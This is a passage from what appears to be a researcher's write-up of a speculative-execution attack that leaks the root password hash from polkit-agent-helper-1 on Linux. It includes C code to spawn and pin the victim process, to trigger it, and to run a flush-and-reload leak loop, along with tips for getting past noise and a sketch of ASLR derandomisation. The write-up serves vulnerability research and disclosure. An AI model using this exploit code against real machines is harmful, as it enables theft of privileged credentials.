        : "r15", "rax", "memory");
}
To trigger the victim, we send it a byte corresponding to the byte offset of the secret that we want to leak.
static struct timespec req = {0,0};

int runsu_poke(child_proc_t *child, char c) {
    int ret = write(child->input, &c, 1);
    clock_nanosleep(CLOCK_REALTIME, 0, &req, NULL);
    return ret;
}
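For completeness, the fork/pin/socket setup described earlier could look roughly like this (a sketch only: the CPU number, the cookie argument, and the helper names are illustrative, and error handling is omitted):

#define _GNU_SOURCE
#include <sched.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

static void pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);    /* pin the calling process */
}

static pid_t spawn_victim(int *input_fd) {
    int sv[2];
    /* A socketpair, not a pipe: reading from a socket makes the victim's
     * read() path deep enough to underflow the RSB. */
    socketpair(AF_UNIX, SOCK_STREAM, 0, sv);

    pid_t pid = fork();
    if (pid == 0) {
        pin_to_cpu(1);                          /* same hardware thread as the attacker */
        dup2(sv[0], 0);                         /* victim's stdin is the socket, not a tty */
        close(sv[1]);
        char *argv[] = { "/usr/libexec/polkit-agent-helper-1", "root", "cookie", NULL };
        execv(argv[0], argv);
        _exit(1);
    }
    close(sv[0]);
    *input_fd = sv[1];                          /* the attacker pokes password bytes in here */
    return pid;
}

The attacker would call pin_to_cpu(1) itself as well before training, so that both processes share the branch predictor and cache state.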
The condensed procedure becomes something similar to:
static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */

for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {
    int guess = -1;
    while (guess == -1) {
        train_gadgetchain(off);
        flush_range(rb_start, RB_STRIDE, RB_SLOTS);
        runsu_poke(runsu, sec_idx-1);
        reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);
        for (int i = 1; i < RB_SLOTS; ++i) {
            if (results[i] > 1) {
                guess = i;
                break;
            }
        }
    }
    secret[sec_idx] = guess;
}
Does this work? Not at all! First of all, we have to win a race condition. We need to have enough time to execute the entire gadget chain before the real return target comes back from the program stack. I was stuck at this point for an awfully long time. I attempted evicting the program stack from a sibling thread, but it didn't work. I attempted to prefetch the code of the respective gadgets by targeting preceding returns, which also did not work. Because the shl gadget is not strictly necessary, I removed it.
Because the results were extremely noisy, rather than flushing and reloading an entire range, I tried to flush and reload only a single entry, matching the 'o' of 'root' in the password hash. If any of the tweaking worked, it should be able to detect this byte.
To slow down the victim, I introduced random memory noise from a sibling thread by simply running an old stress test tool, stress -m 1. This way I would occasionally see what appeared to be signal from the 'o'. However, the results were still noisy. It appeared that certain instances of the victim process were noisier than others, and those instances wouldn't be able to leak anything. So I would test whether each victim instance was able to leak the 'o' before using it. This way, I was able to leak information -- however, at an incredibly low speed! But that is a different problem; we only wanted to conclude that it works!
Behold: https://www.youtube.com/watch?v=VYEVcj-vnbs
What about ASLR?
I skipped this for brevity. However, we do derandomize ASLR, and incredibly efficiently too! We derandomize the lower 32 bits of the address space, which is sufficient: we only need the lower 24 bits to hijack a particular branch, and only the lower 32 bits are recorded in the BTB prediction anyway. To derandomize, we use a "reversed" branch target injection attack, in the sense that we let the victim train a branch in the attacker process. The attacker then guesses around until it finds a branch that gets predicted with a prediction from the victim, thereby learning about its address space layout. For details on the ASLR exploit, I refer you to the paper.